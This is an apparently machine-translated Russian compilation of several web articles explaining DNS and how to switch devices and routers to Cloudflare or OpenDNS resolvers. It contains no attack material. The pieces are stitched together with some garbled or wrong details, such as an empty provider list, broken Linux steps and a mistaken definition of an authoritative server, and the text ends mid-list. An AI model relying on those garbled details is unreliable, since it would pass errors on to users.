Как работает DNS

Система доменных имен, также известная как DNS, является ключевым компонентом Интернета. DNS — это преобразование доменного имени в IP-адрес. Для тех из вас, кто не знает, как это работает, прочтите, чтобы изучить основы.

DNS-запросов

Есть два подхода к поиску DNS:

  1. «Обычный» или прямой поиск DNS и;
  2. Обратный поиск DNS.
Прямой поиск DNS

Прямой поиск или простой поиск в DNS — это наиболее часто используемый подход к DNS. Прямой подход к DNS — это просто определение IP-адреса домена. Людям трудно запоминать длинные цепочки чисел. Вместо этого легче запомнить доменное имя, в котором используются слова. Однако электронные устройства для связи используют потоки единиц и нулей. Единственный способ связи одного компьютера с другим — однозначная идентификация.В Интернете используется метод идентификации по IP-адресам.

Вот простые шаги для разрешения DNS:

  1. Пользователь вводит доменное имя в свой Интернет-браузер. (www.whatismyip.com)
  2. Компьютер отправляет доменное имя в качестве запроса DNS поставщику услуг Интернета (ISP) пользователя.
  3. Интернет-провайдер определяет, есть ли у него IP-адрес, связанный с этим именем;
  4. Если нет, провайдер пересылает запрос другим провайдерам, чтобы найти запись DNS, содержащую данные.
  5. Как только запись найдена, пользователю возвращается IP-адрес домена.
  6. Теперь компьютер пользователя может напрямую связываться с сервером.

Многие сравнивают DNS с «телефонной книгой», которая является чрезмерным упрощением очень сложной системы. Всемирная паутина обеспечивает фундаментальную функцию межсетевого взаимодействия, которая намного превосходит прежние телефонные реле.

Обратный поиск в DNS

При обратном поиске DNS шаги те же, за исключением того, что он начинается с IP-адреса и возвращается с именем домена.В действительности это может занять некоторое время, и когда DNS не может найти то, что ему нужно, будь то доменное имя или IP-адрес, мы получаем экран, который мы все ненавидим, с надписью «эта веб-страница не может быть найдена». Это связано с тем, что серверы заняты или время ожидания веб-браузера истекло.

Что такое DNS? — Введение в DNS

DNS, или система доменных имен, преобразует удобочитаемые доменные имена (например, www.amazon.com) в машиночитаемые IP-адреса (например, 192.0.2.44).

Все компьютеры в Интернете, от вашего смартфона или ноутбука до серверов, которые обслуживают контент для крупных розничных веб-сайтов, находят и связываются друг с другом с помощью номеров. Эти номера известны как IP-адреса . Когда вы открываете веб-браузер и переходите на веб-сайт, вам не нужно запоминать и вводить длинное число. Вместо этого вы можете ввести доменное имя , например, .com и все равно окажетесь в нужном месте.

Служба DNS, такая как Amazon Route 53, — это глобально распределенная служба, которая переводит удобочитаемые имена, такие как www.example.com, в числовые IP-адреса, например 192.0.2.1, которые компьютеры используют для подключения друг к другу. Система DNS в Интернете работает во многом как телефонная книга, управляя сопоставлением имен и номеров. DNS-серверы преобразуют запросы имен в IP-адреса, контролируя, к какому серверу перейдет конечный пользователь, когда он введет доменное имя в свой веб-браузер.Эти запросы называются запросами .

Авторитетный DNS: Авторитетный DNS служба предоставляет механизм обновления, который разработчики используют для управления своими общедоступными DNS-именами. Затем он отвечает на запросы DNS, переводя доменные имена в IP-адреса, чтобы компьютеры могли взаимодействовать друг с другом. Авторитетный DNS имеет окончательную власть над доменом и отвечает за предоставление ответов рекурсивным DNS-серверам с информацией об IP-адресе. Amazon Route 53 — авторитетная система DNS.

Рекурсивный DNS : Клиенты обычно не отправляют запросы напрямую авторитетным службам DNS. Вместо этого они обычно подключаются к другому типу службы DNS, известному как преобразователь или рекурсивная служба DNS . Рекурсивная служба DNS действует как консьерж отеля: хотя она не владеет никакими записями DNS, она действует как посредник, который может получить информацию DNS от вашего имени. Если рекурсивный DNS имеет ссылку DNS , кэшированную или сохраненную в течение определенного периода времени, то он отвечает на запрос DNS, предоставляя информацию об источнике или IP.В противном случае он передает запрос одному или нескольким авторитетным DNS-серверам для поиска информации.

Получите более быстрый Интернет с улучшенным DNS

Возможно, вы не думаете, что сокращение времени, которое требуется на поиск веб-сайтов через систему доменных имен, на миллисекунды, является большим делом. Подумай еще раз. Оптимизируя поиск в DNS, вы можете сэкономить реальное время и сделать жизнь немного приятнее каждый день.

Как вы знаете, DNS — это основная адресная книга Интернета. DNS направляет трафик на веб-сайты и электронную почту в ваш почтовый ящик, сопоставляя доменное имя, которое вы можете запомнить, например google.com на IPv4-адрес, например 216.58.217.206. Практически каждый раз, когда вы делаете что-то в Интернете, вы начинаете с невидимого взаимодействия с DNS.

Вы можете не знать, что поиск DNS занимает в среднем 32 миллисекунды. Может показаться, что это не так уж много, но все, кроме самых простых веб-страниц, требуют десятков запросов DNS.

Каждая ссылка, программа и изображение не на сайте страницы требуют поиска DNS. Например, ссылки на социальные сети Facebook, LinkedIn и Twitter на этой странице? Все они требуют отдельного поиска в DNS.На странице используются шрифты Google для текста? Это тоже требует поиска.

Все складывается. Никто не любит медленный интернет. Итак, когда вы ускоряете поиск в DNS, все получают более высокую производительность в Интернете. Вот как ты это делаешь.

Найдите более быстрого поставщика DNS

Есть более быстрые и медленные поставщики DNS. Обычно DNS, предоставляемый вашим интернет-провайдером, работает медленно. Скорость DNS для них не является приоритетом, и это видно. Однако для провайдеров DNS все решает скорость.Имея несколько глобальных точек присутствия (PoP), они также могут выполнять высокоскоростной поиск как для вашего дома, так и для удаленных офисов.

Есть много поставщиков DNS. Чтобы узнать, кто быстр, а кто нет, ознакомьтесь с PerfOps DNS Performance. Некоторые из наиболее надежных и высокопроизводительных общедоступных преобразователей DNS и их IPv4-адреса DNS включают в себя:

. Вы должны знать, что, как и любой другой бизнес, поставщики DNS могут закрыть свои двери. Например, Norton ConnectSafe был хорошо зарекомендовавшим себя бесплатным общедоступным преобразователем DNS, но он был закрыт в ноябре 2018 года.Итак, следите за своим сервисом, когда остановитесь на нем.

Как выбрать? Ну просто не то какой провайдер самый быстрый. Видите ли, скорость — термин относительный, когда речь идет о преобразователях DNS.

Когда дело доходит до скорости, многое зависит от того, насколько вы «близки» с точки зрения скорости сети к данному преобразователю DNS. Если вы совсем недалеко от OpenDNS PoP, это будет самый быстрый преобразователь DNS. Офис в Перте, Австралия, почти в 2500 милях от OpenDNS Sydney PoP, мог бы лучше обслуживаться DNS Australia.

Чтобы определить, какие из них лучше всего подходят для вас, вы должны протестировать их в каждом офисе. Вы можете сделать это с помощью команды BIND dig для Unix / Linux.

Из оболочки Unix / Linux вы захотите запустить dig с таким синтаксисом: dig @IP-адрес DNS-маршрутизатора test.site.com. Так, например, чтобы узнать, насколько быстро Google Public DNS отвечает на DNS-запрос для hpe.com, вы должны запустить:

dig @ 8.8.8.8 hpe.com

Теперь также есть DNS-сервер с открытым исходным кодом на базе Linux. Test, сценарий оболочки с именем DNSPerfTest.Это позволяет вам проверить производительность самых популярных преобразователей DNS из вашего местоположения.

Если вы не можете запустить dig, вы можете использовать веб-страницу Geektools Dig для выполнения тех же запросов.

Целевой веб-сайт следует менять каждый раз при запуске теста. Это потому, что ваша система может кэшировать результаты DNS-запроса. Это означает, что в следующий раз, когда вы проверите, даже если вы укажете ему использовать другой DNS, результаты будут быстрее, потому что результаты уже ожидают в вашей системе.

После того, как вы опустите виртуальные шины всех служб DNS-преобразователя, вы можете выбрать тот, который лучше всего подходит для вас. Теперь вам нужно настроить свои устройства для использования этих новых услуг.

Оптимизируйте DNS ваших устройств

Я использую Cloudflare в качестве примера, но эти методы будут работать с любым поставщиком DNS.

Маршрутизатор

Если вы используете маршрутизатор для настройки DNS в офисной сети — а вы, вероятно, используете — войдите в него и найдите настройки DNS-сервера.Оказавшись там, запишите существующие записи DNS и замените их следующими:

  • Для IPv4: 1.1.1.1 и 1.0.0.1
  • Для IPv6: 2606: 4700: 4700 :: 1111 и 2606: 4700: 4700 :: 1001

Вот и все. В следующий раз, когда ваши компьютеры будут искать веб-сайт, они будут использовать службы DNS 1.1.1.1.

Windows

В Windows 10:

  1. Щелкните меню «Пуск».
  2. Щелкните значок «Настройки».
  3. Щелкните Сеть и Интернет.
  4. Нажмите «Изменить параметры адаптера».
  5. Дважды щелкните активный сетевой адаптер.
  6. Запишите все существующие записи DNS-сервера для использования в будущем.
  7. Щелкните Использовать следующие адреса DNS-серверов.
  8. Замените эти адреса на адреса DNS 1.1.1.1:
  • Для IPv4: 1.1.1.1 и 1.0.0.1
  • Для IPv6: 2606: 4700: 4700 :: 1111 и 2606: 4700: 4700 :: 1001

В Windows 7 и более ранних версиях щелкните меню «Пуск», затем щелкните «Панель управления» и следуйте этим инструкциям:

  1. Щелкните «Сеть и Интернет».
  2. Нажмите «Изменить настройки адаптера».
  3. Щелкните правой кнопкой мыши сеть Wi-Fi, к которой вы подключены, затем щелкните «Свойства».
  4. Выберите Интернет-протокол версии 4 (или версии 6, если необходимо).
  5. Щелкните «Свойства».
  6. Запишите все существующие записи DNS-сервера для использования в будущем.
  7. Щелкните Использовать следующие адреса DNS-серверов.
  8. Замените эти адреса на адреса DNS 1.1.1.1:
  • Для IPv4: 1.1.1.1 и 1.0.0.1
  • Для IPv6: 2606: 4700: 4700 :: 1111 и 2606: 4700: 4700 :: 1001
MacOS

Для macOS откройте Системные настройки, а затем выполните следующие действия:

  1. Поиск для DNS-серверов и выберите его из раскрывающегося списка.
  2. Нажмите кнопку +, чтобы добавить DNS-сервер, и введите 1.1.1.1.
  3. Щелкните + еще раз и введите 1.0.0.1.
  4. Нажмите ОК, затем нажмите Применить.
Linux

В Linux используйте Network Manager. Там щелкните вкладку IPv4 или IPv6, чтобы просмотреть настройки DNS, а затем выполните следующие действия:

  1. Установите для автоматического переключателя записи DNS значение Выкл.
  2. Укажите адреса DNS 1.1.1.1 в поле записей DNS:
  • Для IPv4: 1.0.0.1
  • Для IPv6: 2606: 4700: 4700 :: 1111 и 2606: 4700: 4700 :: 1001

3. Нажмите «Применить», затем перезапустите браузер.

Android

На Android настроить DNS намного сложнее, чем в других операционных системах. Хотя у Cloudflare есть приложение для службы DNS, в целом, самый простой способ, который работает на большинстве устройств Android, — это установить DNS Changer.

Это приложение работает путем создания локальной виртуальной частной сети на вашем устройстве. Эта VPN существует только на вашем устройстве и в вашем мобильном или Wi-Fi-соединении. Чтобы использовать его с Cloudflare, вы должны поместить 1.1.1.1 и 1.0.0.1 в свои записи DNS.

iPhone

На главном экране iPhone откройте приложение «Настройки» и выполните следующие действия:

  1. Нажмите Wi-Fi, затем выберите предпочитаемую сеть в списке.
  2. Нажмите «Настроить DNS», затем нажмите «Вручную».
  3. Если есть какие-либо существующие записи, нажмите кнопку — и Удалить рядом с каждой из них.
  4. Нажмите кнопку + Добавить сервер, затем введите 1.1.1.1.
  5. Снова нажмите кнопку + Добавить сервер и введите 1.0.0.1. Это для избыточности.
  6. Нажмите кнопку «Сохранить» в правом верхнем углу.

Завершающие соединения

Насколько это изменится? Это, вероятно, сэкономит каждому из ваших сотрудников несколько секунд в день, потенциально при каждой загрузке веб-страницы. Сложите все это, и вы получите настоящую экономию времени. И, учитывая то, как всем нравится, что их Интернет работает как можно быстрее, это должно сделать всех счастливее, а это всегда хорошо для любой компании.

Выберите лучший DNS: уроки для лидеров

  • Оптимизация DNS-запросов — простой способ повысить скорость доступа сотрудников к Интернету.
  • Более быстрый DNS означает более эффективное использование сети.
  • Все это делает сотрудников счастливее.

Discover More Network: новая оригинальная серия от HPE

Эта статья / материалы написаны указанным автором и не обязательно отражают точку зрения компании Hewlett Packard Enterprise.

Использовать OpenDNS

Если у вашего интернет-провайдера возникли проблемы с его службой DNS, переключение на DNS OpenDNS вернет вас в сеть всего за несколько быстрых шагов. Следуйте приведенным ниже инструкциям для вашей операционной системы или маршрутизатора.

Если у вас есть друзья, родственники или коллеги, у которых тот же интернет-провайдер, что и у вас, отправьте им эту информацию, чтобы помочь им вернуться в Интернет. Отправьте им текстовое сообщение или позвоните по IP-адресу http://208.69.38.205 .

Или скажите своим подписчикам в Твиттере, что они могут вернуться в Интернет, следуя инструкциям на http: // 208.69.38.205 .

Вопросы? Твитнуть @OpenDNS, чтобы получить помощь в настройке.

Где вы будете настраивать OpenDNS?

Mac OS X

  1. Перейдите в Системные настройки.
  2. Щелкните Сеть.
  3. Выберите первое соединение в списке и нажмите «Дополнительно».
  4. Выберите вкладку DNS и добавьте 208.67.222.222 и 208.67.220.220 в список DNS-серверов.
  5. Нажмите ОК

Windows 10

  1. Откройте панель управления.
  2. Щелкните Сеть и Интернет.
  3. Щелкните Центр управления сетями и общим доступом.
  4. На левой панели щелкните Изменить параметры адаптера.
  5. Щелкните правой кнопкой мыши сетевой интерфейс, подключенный к Интернету, затем щелкните Свойства.
  6. Выберите Интернет-протокол версии 4 (TCP / IPv4).
  7. Щелкните «Свойства».
  8. Щелкните Использовать следующие адреса DNS-серверов.
  9. Щелкните «Дополнительно».
  10. Введите 208.67.222.222 и 208.67.220.220 в поля DNS-сервера.
  11. Щелкните OK, затем щелкните Close.

Windows 7

  1. Щелкните начальную сферу, затем выберите Панель управления.
  2. Щелкните Центр управления сетями и общим доступом.
  3. Щелкните основное подключение или подключение по локальной сети в разделе «Активные сети».
  4. Нажмите кнопку «Свойства».
    Windows 7 может запросить разрешение на изменение настроек сети.
  5. Выделите «Протокол Интернета версии 4» и нажмите «Свойства».
  6. Установите переключатель «Использовать следующие адреса DNS-серверов» и введите 208.67.222.222 и 208.67.220.220 в полях «Предпочитаемый DNS-сервер» и «Альтернативный DNS-сервер».
  7. Нажмите кнопку «ОК», затем кнопку «Закрыть», затем снова нажмите кнопку «Закрыть». Наконец, закройте окно Центра управления сетями и общим доступом.
    На этом этапе мы настоятельно рекомендуем вам очистить кеш-память преобразователя DNS и кеши веб-браузера, чтобы гарантировать, что ваши новые параметры конфигурации вступят в силу.

Windows XP

  1. Выберите Панель управления в меню «Пуск».
  2. Щелкните «Сетевые подключения» на панели управления.
  3. Выберите подключение в окне «Сетевые подключения».
    Если у вас более одного, выберите соединение по умолчанию / текущее соединение.
  4. Нажмите кнопку «Свойства».
  5. Выберите Интернет-протокол (TCP / IP) и нажмите «Свойства».
  6. Щелкните переключатель Использовать следующие адреса DNS-серверов и введите 208.67.222.222 и 208.67.220.220 в полях Предпочитаемый DNS-сервер и Альтернативный DNS-сервер.
  7. Нажмите ОК

Windows Vista

  1. Щелкните начальную сферу, затем выберите Панель управления.
  2. Щелкните Просмотр состояния сети и задач.
  3. Нажмите «Просмотр статуса».
  4. Нажмите кнопку «Свойства».
  5. Vista может запросить ваше разрешение на внесение изменений. Если да, нажмите кнопку «Продолжить».
  6. Выберите протокол Интернета версии 4 (TCP / IPv4), затем нажмите кнопку «Свойства».
  7. Щелкните переключатель «Использовать следующие адреса DNS-серверов:» и введите адреса OpenDNS, 208.67.222.222 и 208.67.220.220, в поля «Предпочитаемый DNS-сервер» и «Альтернативный DNS-сервер».
  8. Нажмите кнопку «ОК», затем кнопку «Закрыть» и снова кнопку «Закрыть». Закройте окно Центра управления сетями и общим доступом.

Универсальный маршрутизатор

  1. Откройте настройки вашего маршрутизатора.

    Часто настройки задаются в вашем веб-браузере через URL-адрес с номерами (например: http://192.168.0.1). Вам может понадобиться пароль.

    Если вы похожи на нас, и вы давно установили пароль маршрутизатора и не можете его вспомнить сейчас, вы часто можете сбросить пароль до заводского значения по умолчанию, нажав кнопку на самом маршрутизаторе.

    Или настройки могут быть установлены через специальное приложение для вашего маршрутизатора, которое вы установили на свой компьютер при добавлении маршрутизатора.

  2. Найдите настройки DNS-сервера.
    Просканируйте буквы DNS рядом с полем, которое позволяет использовать два или три набора чисел, каждый из которых разбит на четыре группы от одного до трех чисел.
  3. Введите адреса сервера OpenDNS, 208.67.222.222 и 208.67.220.220, в качестве настроек вашего DNS-сервера и сохраните / примените.

Маршрутизатор Linksys

  1. Посетите IP-адрес маршрутизатора в новом окне браузера.
    http://192.168.1.1 — это IP-адрес маршрутизатора Linksys по умолчанию.
  2. Введите сетевой пароль.
    Появится окно «Введите сетевой пароль». Пропустите имя пользователя и введите пароль маршрутизатора (пароль по умолчанию — admin, если вы его не меняли) и нажмите кнопку ОК.
  3. Введите адреса OpenDNS, 208.67.222.222, 208.67.220.220, в поля Статический DNS 1 и Статический DNS 2.
  4. Нажмите кнопку «Сохранить настройки».

Маршрутизатор Netgear

  1. Введите URL-адрес настройки маршрутизатора (http://www.routerlogin.net, http://192.168.0.1 или http://192.168.1.1) в адресную строку веб-браузера.
    http://192.168.1.1 — IP-адрес маршрутизатора Netgear по умолчанию.
  2. Введите пароль.
  3. Введите адреса OpenDNS, 208.67.222.222 и 208.67.220.220, в поля «Первичный DNS» и «Вторичный DNS».
  4. Нажмите кнопку «Применить».
  5. Дождитесь обновления настроек.

Маршрутизатор D-Link

  1. Посетите IP-адрес маршрутизатора (http://192.168.0.1) в новом окне браузера.
    Если вы пытаетесь настроить маршрутизатор D-Link, запишите IP-адрес шлюза по умолчанию вашего компьютера. Шлюз по умолчанию — это IP-адрес маршрутизатора D-Link. По умолчанию это должно быть 192.168.0.1. Большинство устройств D-Link используют диапазон 192.168.0.X.
  2. Введите пароль роутера.
    Примечание: если вы не меняли исходные настройки, имя пользователя по умолчанию — admin, а пароль — пустой (ничего).
  3. Нажмите кнопку «Ручная настройка подключения к Интернету» внизу.
  4. Введите адреса OpenDNS, 208.67.222.222 и 208.67.220.220, в поля «Первичный DNS-сервер» и «Вторичный DNS-сервер».
  5. Нажмите кнопку «Сохранить настройки» вверху.

Общие сведения о DNS — Руководство по DNS для начинающих

DNS (система доменных имен) — одна из самых важных технологий / услуг в Интернете, поскольку без нее Интернет было бы очень сложно использовать.

DNS обеспечивает преобразование или преобразование имени в номер (IP-адрес), позволяя пользователям Интернета использовать легко запоминающиеся имена, а не числа, для доступа к ресурсам в сети и в Интернете.

В этом руководстве мы рассмотрим основы DNS, начиная с того, почему он был разработан, для решения каких проблем он был предназначен.

Основы DNS — Зачем это нужно

Все устройства (компьютеры и т. Д.), Подключенные к Интернету, вашей собственной сети или корпоративной сети, идентифицируются по IP-адресу; , который является числом .

IP-адреса легко обрабатываются компьютерами, но их не так легко запомнить.

Чтобы люди могли легко запомнить имена ( имен хостов, ) используются для идентификации отдельных компьютеров в сети.

В ранних компьютерных сетях был создан простой текстовый файл , называемый файлом hosts, который отображал имена хостов на IP-адреса .

Это позволило людям обращаться к другим компьютерам по имени, а их компьютер переводил это имя в IP-адрес, когда ему нужно было с ним общаться.

Вот файл хоста, взятый с моего ПК. Поставляется со всеми машинами Windows

Расположение файла hosts обычно C \ windows \ system32 \ drivers \ etc

По мере увеличения размеров сети подход с использованием файлов hosts стал непрактичным из-за того, что:

  • Надо было хранить на каждом компьютере
  • Обработка текстового файла могла занять много времени из-за того, что он не был структурирован.
  • Обновлениями было сложно управлять, так как всем компьютерам нужно было предоставить обновленный файл.

Для преодоления этих (и других) ограничений была разработана система DNS .

Система DNS по существу предусматривает:

  • Способ организации имен- Структура доменного имени
  • Протоколы, службы и методы для хранения, обновления и получения IP-адресов для хост-компьютеров. — Система DNS

С точки зрения конечного пользователя вы можете рассматривать систему DNS как структурированный файл хостов.

Структура доменного имени

Файл hosts — это просто список имен и IP-адресов без какой-либо структуры, что затрудняет масштабирование на большое количество машин.

Решение состоит в том, чтобы разместить машины в административных областях , известных как домены , и расположить домены в иерархии.

Это принимает форму древовидной структуры , которая напоминает структуру файловой системы на компьютерах.См. Раздел «Общие сведения о структуре доменного имени

».

Система DNS

Система DNS состоит из множества серверов доменных имен, которые вместе предоставляют имя для сопоставления IP-адресов для зарегистрированных устройств (обычно серверов) в Интернете.

Основные DNS-серверы (корневые серверы) принадлежат и управляются множеством различных организаций и расположены в основном в США.

Вот список http://www.iana.org/domains/root/servers.

Другие компании, включая интернет-провайдеров, имеют свои собственные DNS-серверы, которые иерархически связаны с корневыми серверами, обеспечивая распределенную систему.

Следующее видео объясняет как файл хоста, так и его проблемы, а также основы работы DNS.

К счастью, вам не нужно управлять DNS-сервером или создавать записей DNS для использования Интернета.

Однако вам необходимо иметь доступ к DNS-серверу.

Для доступа к DNS-серверу вам потребуется IP-адрес DNS-сервера.

Обычно он предоставляется вашим интернет-провайдером.

Большинство клиентских компьютеров / устройств будут настроены на автоматическое получение IP-адреса и адреса DNS-сервера.(см. ниже)

Вы можете проверить, какой IP-адрес и какой DNS-адрес вам были назначены, набрав ipconfig / all в командной строке.

Если DNS не работает должным образом, не сможет подключить к другим компьютерам в Интернете, используя их имя, но вы все равно можете подключиться к , используя их IP-адрес , если вы его знаете.

DNS Services — Открытый DNS и Google DNS

Большинство домашних пользователей будут использовать DNS-серверы, предоставленные их провайдером через домашний маршрутизатор.

Однако вы можете использовать альтернативные DNS-серверы, такие как OpenDNS и Google Public DNS .

Это означает, что вам нужно будет вручную добавить этих адресов серверов в настройки DNS.

Зачем нужны альтернативные службы DNS?

Стандартный DNS-сервер не обеспечивает никакой защиты от вредоносных сайтов.

Поскольку DNS является шлюзом в Интернет, многие компании предоставляют услуг, связанных с безопасностью, на основе общедоступной службы DNS.

Они делают это путем фильтрации DNS-запросов . Большинство из них обнаружит фишинговых и сайтов спама, а многие обеспечат защиту от сайтов для взрослых.

Большинство пакетов интернет-продуктов для обеспечения безопасности будут использовать некоторую форму DNS с фильтром .

Open DNS была одной из первых компаний, которые сделали это, и они бесплатно предложили защиту семьи.

Адреса DNS-серверов: 208.67.222.222 и 208.67.220.220

Google также предоставляет общедоступную службу DNS.Это не обеспечивает фильтрацию, но может обеспечить более быструю службу DNS, чем ваш интернет-провайдер.

Если ваш интернет-провайдер блокирует доступ к адресу по какой-либо причине, используя альтернативный DNS-сервер, такой как Google Public DNS, можно избежать блокировок интернет-провайдера.

IP-адреса: 8.8.8.8 и 8.8.4.4

Основные концепции DNS

Есть много терминов, которые вы увидите, читая о DNS.

Термины, такие как зоны, файлы зон, сервер кэширования и т. Д.

Это видео — хорошее введение в понимание этих основных терминов.

См. Пояснения к зонам DNS и файлам зон

Разрешение имени DNS

Чтобы преобразовать имя хоста в IP-адрес с помощью DNS, вам понадобится DNS-клиент на вашем компьютере, и этот клиент должен знать IP-адрес DNS-сервера.

DNS-клиент запрашивает свой DNS-сервер, который затем выполняет процесс, чтобы получить ответ — см. Объяснение поиска DNS.

Разрешение имени хоста

DNS и Host — это два метода разрешения имен, но они не единственные.

Клиент Windows будет использовать DNS, Hosts и другие методы для преобразования имени хоста или имени компьютера в IP-адрес. См. Общие сведения о методах разрешения имен хостов.

Динамический DNS

Внутренние IP-адреса обычно нестатические , так как они обычно назначаются DHCP-сервером.

В крупных корпоративных сетях, использующих собственные внутренние DNS- и DHCP-серверы, требовалось поддерживать DNS-серверы в актуальном состоянии.

DDNS (динамические обновления DNS) был введен для решения этой проблемы — Wiki

Основная процедура:

  1. Машина получает IP-адрес от DHCP
  2. Машина или DHCP-сервер связывается с DNS-сервером и обновляет DNS-запись , используя IP-адрес и DNS-имя.

Домашние сети и сети малого бизнеса не используют свои собственные DNS-серверы, потому что у них не так много серверов / машин, и им на самом деле не нужен DDNS, потому что все их машины находятся в одном широковещательном домене.

Поскольку они находятся в том же широковещательном домене , сеть Windows разрешит имена и IP-адреса, даже если IP-адреса изменятся.

Однако малому бизнесу / домашней сети может потребоваться DDNS , если они хотят предоставить доступ к внутренним ресурсам через Интернет.См. Руководство по динамическому DNS и службам

.

Проблемы с DNS

Если у вас есть проблемы с подключением к ресурсам в Интернете, DNS — это одна из первых вещей, которую нужно проверить.

Основным средством устранения неполадок является nslookup , и он доступен во всех основных операционных системах. См. с помощью nslookup.

Сводка

Система DNS обеспечивает отображение доменного имени на IP-адрес для устройств, подключенных к Интернету, и это имеет решающее значение для работы Интернета.

Обычно вам не нужно беспокоиться об этом, поскольку ваш интернет-провайдер и домашний маршрутизатор автоматически назначают адрес DNS-сервера.

Если вас беспокоит безопасность, рассмотрите возможность использования отфильтрованной службы DNS, например Open DNS .

Связанные руководства и ресурсы:

Оцените? И используйте Комментарии, чтобы сообщить мне больше

Что такое DNS, как это работает + Уязвимости

Система доменных имен (DNS) — это интернет-версия Желтых страниц.В старину, когда вам нужно было найти адрес компании, вы искали его в желтых страницах. DNS работает точно так же, за исключением того, что вам на самом деле не нужно ничего искать: ваш компьютер, подключенный к Интернету, сделает это за вас. Благодаря ему ваш компьютер может найти Google, ESPN.com или Varonis.com.

Протокол требует, чтобы два компьютера обменивались данными в IP-сети. Подумайте об IP-адресе как о почтовом адресе — чтобы один компьютер «нашел» другой, ему нужно знать номер другого компьютера.Поскольку большинство людей лучше запоминают имена — www.varonis.com — чем числа — 104.196.44.111, им требовалась программа для компьютеров, переводящая имена в IP-адреса.

Ненавидите компьютеры в профессиональном плане? Попробуйте карты против ИТ.

Программа для преобразования имен в числа и наоборот называется «DNS» или системой доменных имен, а компьютеры, на которых работает DNS, называются «DNS-серверами». Без DNS нам пришлось бы запоминать IP-адрес любого сервера, к которому мы хотели подключиться, — неинтересно.

Как работает DNS

DNS является такой неотъемлемой частью Интернета, что важно понимать, как он работает.

Думайте о DNS как о телефонной книге, но вместо того, чтобы сопоставлять имена людей с их уличными адресами, телефонная книга сопоставляет имена компьютеров с IP-адресами. Каждое сопоставление называется «записью DNS».

В Интернете много компьютеров, поэтому нет смысла собирать все записи в одну большую книгу. Вместо этого DNS организован в виде небольших книг или доменов.Домены могут быть очень большими, поэтому они организованы в более мелкие книги, называемые «зонами». Ни один DNS-сервер не хранит все книги — это было бы непрактично.

Вместо этого существует множество DNS-серверов, которые хранят все записи DNS для Интернета. Любой компьютер, который хочет узнать номер или имя, может запросить свой DNS-сервер, а его DNS-сервер знает, как запрашивать — или запрашивать — другие DNS-серверы, когда им нужна запись. Когда DNS-сервер запрашивает другие DNS-серверы, он выполняет «восходящий» запрос.Запросы для домена могут идти «вверх по течению», пока не вернутся к полномочиям домена или «авторитетному серверу имен».

Авторитетный сервер имен — это то место, где администраторы управляют именами серверов и IP-адресами своих доменов. Всякий раз, когда администратор DNS хочет добавить, изменить или удалить имя сервера или IP-адрес, он вносит изменения в свой авторитетный DNS-сервер (иногда называемый «главным DNS-сервером»). Также существуют «подчиненные» DNS-серверы; эти DNS-серверы содержат копии DNS-записей для своих зон и доменов.

Четыре DNS-сервера, загружающие веб-страницу

  • DNS-рекурсор: DNS-рекурсор — это сервер, который отвечает на DNS-запрос и запрашивает адрес у другого DNS-сервера или уже имеет сохраненный IP-адрес для сайта.
  • Корневой сервер имен : Корневой сервер имен — это сервер имен для корневой зоны. Он отвечает на прямые запросы и может возвращать список авторитетных серверов имен для соответствующего домена верхнего уровня.
  • Сервер имен TLD: Сервер домена верхнего уровня (TLD) является одним из DNS-серверов высокого уровня в Интернете.При поиске по адресу www.varonis.com сначала ответит сервер TLD для домена .com, а затем DNS выполнит поиск по запросу varonis.
  • Авторитетный сервер имен: Авторитетный сервер имен является последней остановкой для DNS-запроса. Официальный сервер имен имеет DNS-запись для запроса.

Типы службы DNS

В Интернете есть два различных типа DNS-сервисов. Каждая из этих служб обрабатывает запросы DNS по-разному в зависимости от их функции.

  • Рекурсивный преобразователь DNS: Рекурсивный преобразователь DNS — это DNS-сервер, который отвечает на запрос DNS и ищет авторитетный сервер имен или кэшированный результат DNS для запрошенного имени.
  • Полномочный DNS-сервер: Полномочный DNS-сервер хранит DNS-запрос. Поэтому, если вы запрашиваете у авторитетного DNS-сервера один из его IP-адресов, ему больше не нужно спрашивать. Авторитетный сервер имен является последней инстанцией для этих имен и IP-адресов.

Общедоступный DNS и частный DNS

DNS был создан, чтобы люди могли подключаться к услугам в Интернете. Чтобы сервер был доступен в общедоступном Интернете, ему нужна общедоступная запись DNS, а его IP-адрес должен быть доступен в Интернете — это означает, что он не заблокирован брандмауэром. Публичные DNS-серверы доступны всем, кто может к ним подключиться, и не требуют аутентификации.

Интересно, что не все записи DNS являются общедоступными. Сегодня, помимо разрешения сотрудникам использовать DNS для поиска вещей в Интернете, организации используют DNS, чтобы их сотрудники могли находить частные внутренние серверы.Когда организация хочет, чтобы имена серверов и IP-адреса оставались конфиденциальными или недоступными напрямую из Интернета, они не перечисляют их на общедоступных DNS-серверах. Вместо этого организации перечисляют их на частных или внутренних DNS-серверах — внутренние DNS-серверы хранят имена и IP-адреса для внутренних файловых серверов, почтовых серверов, контроллеров домена, серверов баз данных, серверов приложений и т. Д. — всего важного.

Что нужно запомнить — как и внешние DNS-серверы, внутренние DNS-серверы не требуют аутентификации.Это потому, что DNS был создан очень давно, когда безопасность не была такой большой проблемой. В большинстве случаев любой, кто находится внутри брандмауэра — путем проникновения или подключения через VPN — может запрашивать внутренние DNS-серверы. Единственное, что мешает кому-либо «извне» получить доступ и запросить внутренние DNS-серверы, — это то, что они не могут подключиться к ним напрямую.

  • Общедоступный DNS: Чтобы сервер был доступен в общедоступном Интернете, ему нужна общедоступная запись DNS, а его IP-адрес должен быть доступен в Интернете.
  • Частный DNS : Компьютеры, которые находятся за брандмауэром или во внутренней сети, используют частную запись DNS, чтобы локальные компьютеры могли идентифицировать их по имени. Внешние пользователи Интернета не будут иметь прямого доступа к этим компьютерам.

7 шагов поиска DNS

Давайте посмотрим, как именно работает DNS-запрос.

  1. DNS-запрос запускается при попытке доступа к компьютеру в Интернете . Например, вы набираете www.varonis.com в адресной строке браузера.
  2. Первой остановкой для DNS-запроса является локальный DNS-кеш. При доступе к разным компьютерам эти IP-адреса сохраняются в локальном репозитории. Если вы ранее заходили на сайт www.varonis.com, у вас есть IP-адрес в кэше.
  3. Если у вас нет IP-адреса в локальном кэше DNS, DNS проверит его с помощью рекурсивного DNS-сервера. Ваша ИТ-группа или поставщик услуг Интернета (ISP) обычно предоставляет для этой цели рекурсивный DNS-сервер.
  4. У рекурсивного DNS-сервера есть собственный кеш, и если у него есть IP-адрес, он вернет его вам. Если нет, он спросит другой DNS-сервер.
  5. Следующая остановка — это серверы имен TLD, в данном случае сервер имен TLD для адресов .com. У этих серверов нет нужного нам IP-адреса, но они могут отправить DNS-запрос в правильном направлении.
